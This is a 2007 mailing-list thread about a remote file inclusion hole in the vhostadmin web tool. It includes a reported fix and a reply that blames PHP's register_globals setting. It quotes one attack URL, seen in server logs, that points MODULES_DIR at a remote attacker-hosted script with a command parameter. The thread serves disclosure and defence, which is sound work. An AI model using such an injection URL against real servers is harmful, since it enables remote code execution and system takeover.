On Jan 29, 2007, at 21:52 , Shane Chrisp wrote:

I know this is not exactly vpopmail related, but as its a vpopmail
related tool i thought others here would like to be made aware of this.


I have been using vhostadmin for a while now, and have just noticed that
it is vulnerable to a xss attack which could lead to the underlying
system being cracked. The problem is the $MODULES_DIR var is not being
protected against injection of a remote path and simply accepts whatever
is passed to it such as

http://server/path/to/vhostadmin/modules/main.php? MODULES_DIR=http://remoteserver/path/to/bad/file.php?&cmd=0wn3d


A quick fix is to change global.inc and change
$MODULES_DIR = 'modules';
to
define("MODULES_DIR", "modules");

and then change all references in any file it appears in of

$MODULES_DIR
to
MODULES_DIR

and comment out any references to

global $MODULES_DIR;
to
//global $MODULES_DIR;


There may be other issues, but this one I came accross yesterday when I
noticed the above formated url in the apacge logs. Also, we have
modified some of the system ourselves, so it is entirely possible that
we may be partly to blame for some or all of this, but it would
certainly be worth watching out for if you are using the system.

Regards
Shane


Or turn off Register_global, and then MODULES_DIR would only exist in $_GET[]. I chalk this one up to a bad PHP configuration:

http://www.php.net/register_globals

While it would not stop attacks that could cause you to include stuff if other variables are not checked before blindly being used from the $_POST and $_GET arrays, however the attack you just mentioned is null and void.

If you are running with register_globals on, you should seriously re- consider. It will be deprecated, and I can't wait for it to finally be gone, then script writers will have to learn how to use the array's that were meant for that sort of data.

Bert JW Regeer

Attachment: smime.p7s
Description: S/MIME cryptographic signature

Reply via email to